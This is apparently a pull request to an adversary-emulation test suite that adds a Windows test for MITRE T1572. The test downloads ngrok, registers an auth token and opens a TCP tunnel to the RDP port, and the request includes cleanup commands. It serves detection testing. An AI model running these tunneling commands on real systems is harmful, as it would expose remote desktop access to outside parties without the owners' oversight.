### PR TITLE
Atomic Test #4 - RDP tunneling over Ngrok Cloud

### DIFF
--- a/atomics/T1572/T1572.md
+++ b/atomics/T1572/T1572.md
@@ -16,6 +16,7 @@ Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/tech
 
 - [Atomic Test #3 - DNS over HTTPS Long Domain Query](#atomic-test-3---dns-over-https-long-domain-query)
 
+- [Atomic Test #4 - RDP tunneling over Ngrok Cloud](#atomic-test-4---rdp-tunneling-over-ngrok-cloud)
 
 <br/>
 
@@ -129,6 +130,46 @@ The simulation involves sending DoH queries that gradually increase in length un
 ```powershell
 Set-Location PathToAtomicsFolder
 .\T1572\src\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - RDP tunneling over Ngrok Cloud
+This test simulates RDP tunneling through the reverse proxy tool Ngrok.
+The simulation involves creating a RDP tunnel over a specified port using Ngrok.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4cdc9fc7-53fb-4894-9f0c-64836943ea60
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| api_token | API token from Ngrok account | string | N/A
+| port_num | RDP port number | string | 3389 |
+| download | link to download Ngrok | string | https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Set-Location PathToAtomicsFolder
+C:\Users\Public\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null
+Start-ThreadJob -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
+Start-Sleep -s 5 
+Stop-Job -Name Job1 | Out-Null
 ```
 
 

--- a/atomics/T1572/T1572.yaml
+++ b/atomics/T1572/T1572.yaml
@@ -106,3 +106,45 @@ atomic_tests:
       Set-Location PathToAtomicsFolder
       .\T1572\src\T1572-doh-domain-length.ps1 -DohServer #{doh_server} -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
     name: powershell
+- name: run ngrok
+  auto_generated_guid: 4cdc9fc7-53fb-4894-9f0c-64836943ea60
+  description: |
+    Download and run ngrok. Create tunnel to chosen port.
+
+  supported_platforms:
+  - windows
+  input_arguments:
+    api_token:
+      description: ngrok API
+      type: string
+      default: N/A
+    port_num:
+      description: port number for tunnel
+      type: string
+      default: 3389
+    download:
+      description: link to download ngrok
+      type: string
+      default: https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Download ngrok
+    prereq_command: |
+      if (Test-Path C:\Users\Public\ngrok) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Path C:\Users\Public\ngrok -ItemType Directory | Out-Null
+      Invoke-WebRequest #{download} -OutFile C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip
+      Expand-Archive C:\Users\Public\ngrok\ngrok-v3-stable-windows-amd64.zip -DestinationPath C:\Users\Public\ngrok
+  executor:
+    command: |
+      C:\Users\Public\ngrok\ngrok.exe config add-authtoken #{api_token} | Out-Null
+      Start-ThreadJob -ScriptBlock { C:\Users\Public\ngrok\ngrok.exe tcp #{port_num} } | Out-Null
+      Start-Sleep -s 5 
+      Stop-Job -Name Job1 | Out-Null
+    cleanup_command: |
+      Remove-Item C:\Users\Public\ngrok -Recurse -ErrorAction Ignore
+      Remove-Item C:\%userprofile%\AppData\Local\ngrok -ErrorAction Ignore
+    name: powershell
+    elevation_required: true
+

--- a/atomics/T1572/T1572.yaml
+++ b/atomics/T1572/T1572.yaml
@@ -120,7 +120,7 @@ atomic_tests:
       default: N/A
     port_num:
       description: port number for tunnel
-      type: string
+      type: integer
       default: 3389
     download:
       description: link to download ngrok


### PR DESCRIPTION
Adding Atomic Test #4 - RDP tunneling over Ngrok Cloud to T1572

**Details:**
Adding an additional test to the technique T1572 to test for the use of Ngrok. Ngrok is a reverse proxy service that can be used to tunnel RDP, potentially concealing malicious traffic. https://attack.mitre.org/software/S0508/

**Testing:**
Tested execution of yaml file with the invoke-atomictest command.

**Associated Issues:**
N/A